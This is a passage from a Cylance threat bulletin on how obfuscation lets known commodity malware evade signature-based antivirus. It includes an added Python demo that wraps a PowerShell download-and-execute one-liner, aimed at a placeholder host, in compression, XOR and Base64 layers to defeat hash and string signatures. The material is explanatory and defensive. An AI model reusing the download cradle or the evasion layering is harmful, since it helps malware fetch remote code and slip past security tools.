You’d think that life would be pretty hard for threat actors these days, given the plethora of security companies out there feeding insatiable, ever-growing blacklists of malware that track millions upon millions of payload fingerprints.
You’d think getting malware past antivirus products would be a Herculean task, requiring the development of new, never-before-seen custom malware.
If you thought either of those things, you’d be wrong.
Threat actors are increasingly reaching their targets not with exotic, custom payloads but with so-called commodity malware – off-the-shelf programs you can find online, either for free or else for a nominal fee. These are pieces of malware known to all antivirus companies and whose fingerprints (or “signatures”) should be immediately recognizable to them.
So why are threat actors increasingly using commodity malware? And why are they successful in doing so?
The short answer to both is: obfuscation.
In this Threat Intelligence Bulletin, Cylance explains what obfuscation is and why it works. And we demonstrate how one recently observed obfuscation technique succeeded in bypassing most antivirus products.
Background and Discussion
Cylance has been tracking a trend that sees threat actors turning to common, commodity malware more and more. They’re doing so because it’s cheap, easy to use and, if found, helps to anonymize them. When the fingerprint of a piece of malware is known to all and is within the reach of everyone, the threat actor can hide amongst an impossibly large group of suspects. The payload signature is essentially rendered meaningless.
The apparent paradox of commodity malware succeeding despite having a known signature is explained by obfuscation, a technique that changes the overall signature of the file while still delivering the familiar payload.
Obfuscation shifts the attacker’s focus from customizing the final payload to customizing the delivery method. One can assume that this shift is a response to the way in which many antivirus products go about catching malware.
As alluded to above, many antivirus products rely on signatures to identify malware. For many of them, the signature is just a hash or a simple string. In this context, a hash is a fixed-length digest (such as an MD5 or SHA-256 value) computed over the bytes of a file; changing even a single byte of the file yields a completely different hash. Signatures are very often hashes, but they can also be some other brief representation of a unique bit of code inside a piece of malware, such as a distinctive byte sequence or string.
Obfuscation is a term of art that describes a set of techniques used to evade antivirus products that rely heavily on signatures. These techniques change the overall structure of a piece of malware without altering its function. Often, this has the overall result of creating layers which act to bury the ultimate payload, like the nested figures in a Russian doll.
Common obfuscation techniques include the use of:
- Packers, which compress or “pack” a malware program
- Crypters, which encrypt a malware program (or portions thereof)
- Other obfuscators, which mutate – but do not neuter – the malware program in a variety of ways, changing the program’s bytes and usually its overall size
The effect of these obfuscation techniques is to alter the hash and, frequently, the signature of the malware. Packing or encrypting replaces the file’s bytes wholesale, so the hash no longer matches any blacklist entry, and the unique strings of code a scanner looks for no longer appear in the on-disk form; they only reappear when the malware unpacks or decrypts itself at run time.
While some antivirus products search for common obfuscating techniques so that they too may be blacklisted, this practice is not nearly as well established as the blacklisting of malware payload signatures.
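As an added example that is not part of the Cylance bulletin, the Python script below builds a toy signature scanner (one SHA-256 hash signature and two string signatures, all constructed for a constructed sample payload) and then wraps that same payload in three reversible layers: a packer (zlib compression), a crypter (repeating-key XOR) and a Base64 outer wrapper of the rudimentary kind droppers often use as a first layer. The scanner flags the raw payload, misses the obfuscated form, and flags the payload again once the layers are peeled back, which is why a scanner that can unwrap or emulate the layers sees what a plain hash or string matcher cannot. The payload text, the blacklist, the key and the layer format are all assumptions made for the demonstration.

```python
"""Added example (not from the Cylance bulletin): a toy signature scanner and
three reversible obfuscation layers that defeat it without changing the payload."""
import base64
import hashlib
import zlib

# Constructed sample "payload": a one-liner an AV vendor is assumed to have fingerprinted.
PAYLOAD = (b'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient)'
           b'.DownloadString(\'http://example.invalid/a.ps1\')"')

# Constructed blacklist: one hash signature and two string signatures for PAYLOAD.
HASH_BLACKLIST = {hashlib.sha256(PAYLOAD).hexdigest()}
STRING_SIGNATURES = [b"Net.WebClient", b"DownloadString"]


def scan(sample: bytes) -> dict:
    """Return which signature types fire on the raw bytes of a sample."""
    return {
        "hash": hashlib.sha256(sample).hexdigest() in HASH_BLACKLIST,
        "string": any(sig in sample for sig in STRING_SIGNATURES),
    }


# --- Obfuscation layers: each is reversible, and the payload itself is never altered ---

def pack(data: bytes) -> bytes:
    """'Packer': compress the payload, so both the on-disk bytes and the size change."""
    return b"PK1" + zlib.compress(data, 9)  # "PK1" is an assumed stub marker


def unpack(blob: bytes) -> bytes:
    if not blob.startswith(b"PK1"):
        raise ValueError("not a packed blob")
    return zlib.decompress(blob[3:])


def crypt(data: bytes, key: bytes) -> bytes:
    """'Crypter': repeating-key XOR; hides every signature string and is its own inverse."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def obfuscate(payload: bytes, key: bytes) -> bytes:
    """Nest the layers like a Russian doll: base64( xor( pack(payload) ) )."""
    return base64.b64encode(crypt(pack(payload), key))


def deobfuscate(blob: bytes, key: bytes) -> bytes:
    """What the loader does at run time: peel the layers back to the original bytes."""
    return unpack(crypt(base64.b64decode(blob), key))


def demo(key: bytes = b"k3y") -> dict:
    """Raw payload is caught, the obfuscated form is not, the loader still recovers
    a byte-identical payload, and a re-keyed build has yet another hash."""
    blob = obfuscate(PAYLOAD, key)
    recovered = deobfuscate(blob, key)
    rekeyed = obfuscate(PAYLOAD, key + b"!")
    return {
        "raw_detected": scan(PAYLOAD),
        "obfuscated_detected": scan(blob),
        "recovered_identical": recovered == PAYLOAD,
        "hash_changed": hashlib.sha256(blob).digest() != hashlib.sha256(PAYLOAD).digest(),
        # Every new key yields a new hash: a fresh, never-seen file from the same payload.
        "rekey_changes_hash": hashlib.sha256(rekeyed).digest() != hashlib.sha256(blob).digest(),
        # A scanner that unwraps or emulates the layers sees the familiar payload again.
        "detected_after_unwrap": scan(recovered),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Changing the XOR key alone produces a file with a different hash every time, which is the point of the bulletin: the attacker customizes the wrapper, not the payload, and a hash blacklist never catches up.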
In the Technical Analysis below, we dissect an example where the method of obfuscation leveraged features of PowerShell, a tool that comes built in to Microsoft Windows.
Cylance came across the malware file under analysis, which uses a rare PowerShell obfuscation method, while looking into some fresh and poorly detected malicious scripts. The sample appeared to use several techniques described by Daniel Bohannon. The file we analyzed was a ZIP file containing both a PDF document and a VBS script:
At the time we found it, the file was only detected by three products:
The VBS script used a rudimentary Base64 encoding to obfuscate the first layer. The contents of this script are displayed below.